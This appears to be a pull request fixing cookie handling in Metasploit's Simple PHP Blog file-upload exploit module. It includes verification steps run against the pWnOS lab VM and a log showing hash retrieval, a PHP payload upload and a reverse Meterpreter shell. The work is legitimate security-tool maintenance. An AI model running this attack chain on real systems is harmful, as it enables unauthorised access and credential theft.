### PR TITLE
Corrected headers check for retrieved cookie

### DIFF
--- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb
+++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res
       print_good("Successfully logged in as #{user}:#{pass}")
 
-      if res.get_cookies =~ /my_id=(.*)/
+      if (res.headers['Set-Cookie'] =~ /my_id=(.*)/)
         session = $1
         print_good("Successfully retrieved cookie: #{session}")
         return session

--- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb
+++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res
       print_good("Successfully logged in as #{user}:#{pass}")
 
-      if (res.headers['Set-Cookie'] =~ /my_id=(.*)/)
+      if (res.get_cookies =~ /PHPSESSID=(.+);/)
         session = $1
         print_good("Successfully retrieved cookie: #{session}")
         return session
@@ -147,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }, 25)
 
     if (res)
-      print_good("Successfully Uploaded #{newpage}")
+      print_good("Successfully uploaded #{newpage}")
     else
       print_error("Error uploading #{newpage}")
     end


### PR DESCRIPTION
Previous get_cookies method not working properly.

This pull corrects a non-functioning cookie verification in the sphpblog_file_upload exploit.

Bug: (https://github.com/rapid7/metasploit-framework/issues/14441)

## Verification

List the steps needed to make sure this thing works

Start Kali with updated Metasploit, add NIC assigned to 10.10.10.250/24
Start pWnOS v2.0 (already hardcoded as 10.10.10.100)

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapp/sphpblog_file_upload`
- [ ] `set rhosts 10.10.10.100`
- [ ] `set uri /blog`
- [ ] `set lhost 10.10.10.250`
- [ ] `exploit`

This should trigger a successful exploit:
```
msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.10.250:4444 
[*] Successfully retrieved hash: $1$gJEbDRbd$5mYGKYmViq/IcU/M9Mdza1
[*] Successfully removed /config/password.txt
[*] Successfully created temporary account.
[*] Successfully logged in as QErwYO:2MsbV2
[*] Successfully retrieved cookie: 5ciq80flifo4kdt2lfmniqokj7
[*] Successfully uploaded bHMPBcr8mUgjeQnD0G2m.php
[*] Successfully uploaded zAQfEXaTovTJORZDxKvh.php
[*] Successfully reset original password hash.
[*] Successfully removed /images/bHMPBcr8mUgjeQnD0G2m.php
[*] Calling payload: /images/zAQfEXaTovTJORZDxKvh.php
[*] Sending stage (39282 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.10.250:4444 -> 10.10.10.100:57843) at 2020-11-28 12:02:05 -0600
[*] Successfully removed /images/zAQfEXaTovTJORZDxKvh.php
```